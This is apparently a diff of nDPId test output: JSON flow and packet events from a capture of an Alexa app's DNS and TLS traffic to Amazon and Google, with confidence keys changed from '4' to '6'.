00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1490976195524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976195524,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC96\/xAAEARoTmsECoBrBAq2AA1OlYAqVJ+4muBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAW8AAoDd3d3A2NkbsAQwCwABQABAAAAWAAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAABoABDRV0Y\/AQgABAAEAAAAaAAQ0VdF6wEIAAQABAAAAGgAENFXR2MBCAAEAAQAAABoABDRV0cU="} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}} 
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1490976195545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1490976195545,"pkt":"AMDKkaPvePiC0\/vCCABFAABIWmVAAEARM0asECrYrBAqAZ3pADUANBzi5IoBAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"} 
-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1490976195628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976195628,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw6\/5AAEARoYSsECoBrBAq2AA1nekAXGuw5IqBgAABAAIAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAErAAwHYW5kcm9pZAFswBzAOAABAAEAAAErAATYOsJO"} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": 
{"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"} 
-00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} -02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} +00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} 
